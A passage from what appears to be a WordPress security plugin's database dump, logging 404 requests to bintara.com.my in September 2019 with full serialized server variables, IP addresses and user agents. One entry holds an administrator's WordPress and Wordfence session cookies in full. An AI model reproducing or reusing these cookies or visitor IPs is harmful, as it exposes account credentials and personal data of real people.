charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"1D0C7507-DBF2-4454-A647-1DA91AED261D\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYngqTsZuynGEzmE1y1QuQAAAAs\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.115.214\";s:11:\"REMOTE_PORT\";s:5:\"50481\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYngqTsZuynGEzmE1y1QuQAAAAs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569317033.3147\";s:12:\"REQUEST_TIME\";s:10:\"1569317033\";}}','notice','2019-09-24 09:23:55','2019-09-24 09:23:53',31086904,32904104,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.115.214'),(26905,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:3:\"3-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"3\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"Mac\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"646D5F0B-86EA-4570-99CB-D0398F738770\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.29.917\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:3:\"3-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYnd8DsZuynGEzmE1y1PFAAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.115.214\";s:11:\"REMOTE_PORT\";s:5:\"56240\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYnd8DsZuynGEzmE1y1PFAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569316353.1518\";s:12:\"REQUEST_TIME\";s:10:\"1569316353\";}}','notice','2019-09-24 09:12:56','2019-09-24 09:12:33',31489368,33298256,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.115.214'),(26904,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:69:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/wp-admin/admin-ajax.php\";s:14:\"CONTENT_LENGTH\";s:3:\"125\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"3\";s:13:\"H2_STREAM_TAG\";s:4:\"81-3\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:46:\"application/json, text/javascript, */*; q=0.01\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:788:\"icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258; wordpress_sec_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1569376332%7CDHME1XFrUhlecJWYWREpsqI0IQP4JrrN9xSe7eOnBLf%7C7666d1ce86dd205c7585f82f8f746a43fec60d35baf243ae9d603987f35459c0; wordpress_logged_in_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1569376332%7CDHME1XFrUhlecJWYWREpsqI0IQP4JrrN9xSe7eOnBLf%7C96d187f4ef032996fbf808f94ac1a8bab67286bc737d9ad6ec25670084de842b; wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7Ceb19a3fe82fc8ce4d135151b0fa401c08e97aa9bf901e8cdeaea7983f994015d; wp-saving-post=1-saved; wp-settings-time-1=1569311544; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D0%26editor_plain_text_paste_warning%3D1%26post_dfw%3Doff\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_ORIGIN\";s:22:\"https://bintara.com.my\";s:12:\"HTTP_REFERER\";s:102:\"https://bintara.com.my/wp-admin/post.php?post=1449&action=elementor&ip-geo-block-auth-nonce=81f718a471\";s:19:\"HTTP_SEC_FETCH_MODE\";s:4:\"cors\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:21:\"HTTP_X_REQUESTED_WITH\";s:14:\"XMLHttpRequest\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"3\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"81-3\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYnPUMrlkXDIX@rVBbEA3AAAAAM\";s:19:\"REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYnPUMrlkXDIX@rVBbEA3AAAAAM\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.115.214\";s:11:\"REMOTE_PORT\";s:5:\"51983\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:10:\"SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYnPUMrlkXDIX@rVBbEA3AAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569312592.4222\";s:12:\"REQUEST_TIME\";s:10:\"1569312592\";}}','notice','2019-09-24 08:09:54','2019-09-24 08:09:52',31536592,31798432,'https://bintara.com.my/wp-admin/admin-ajax.php',1,1,'175.142.115.214'),(26903,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:136:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.189 Safari/537.36 Vivaldi/1.95.1077.60\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYnEr8rlkXDIX@rVBbH-RQAAAEw\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:14:\"27.102.129.131\";s:11:\"REMOTE_PORT\";s:5:\"56645\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYnEr8rlkXDIX@rVBbH-RQAAAEw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569309872.049\";s:12:\"REQUEST_TIME\";s:10:\"1569309872\";}}','notice','2019-09-24 07:24:33','2019-09-24 07:24:32',30755016,32565808,'https://bintara.com.my/our-history/about1/',1,0,'27.102.129.131'),(26902,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"F34B33ED-9622-4C1F-96BB-E8EADE2EC523\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYm9in@TiEpPz-1@8IenRgAAAYQ\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.115.214\";s:11:\"REMOTE_PORT\";s:5:\"50130\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYm9in@TiEpPz-1@8IenRgAAAYQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569308042.3254\";s:12:\"REQUEST_TIME\";s:10:\"1569308042\";}}','notice','2019-09-24 06:54:04','2019-09-24 06:54:02',31082928,32892440,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.115.214'),(26901,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"21FB405A-7A4B-479E-B7BE-C969BBA0AB0C\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYm5c8rlkXDIX@rVBbH9TgAAAEE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"183.171.184.137\";s:11:\"REMOTE_PORT\";s:5:\"49978\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYm5c8rlkXDIX@rVBbH9TgAAAEE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569306995.6826\";s:12:\"REQUEST_TIME\";s:10:\"1569306995\";}}','notice','2019-09-24 06:36:37','2019-09-24 06:36:36',31082384,32886576,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'183.171.184.137'),(26900,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"59730\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYmsV1jyRHmaHiu4v5ehEgAAAcw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569303639.1105\";s:12:\"REQUEST_TIME\";s:10:\"1569303639\";}}','notice','2019-09-24 05:40:41','2019-09-24 05:40:39',31203200,33022864,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(26899,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft 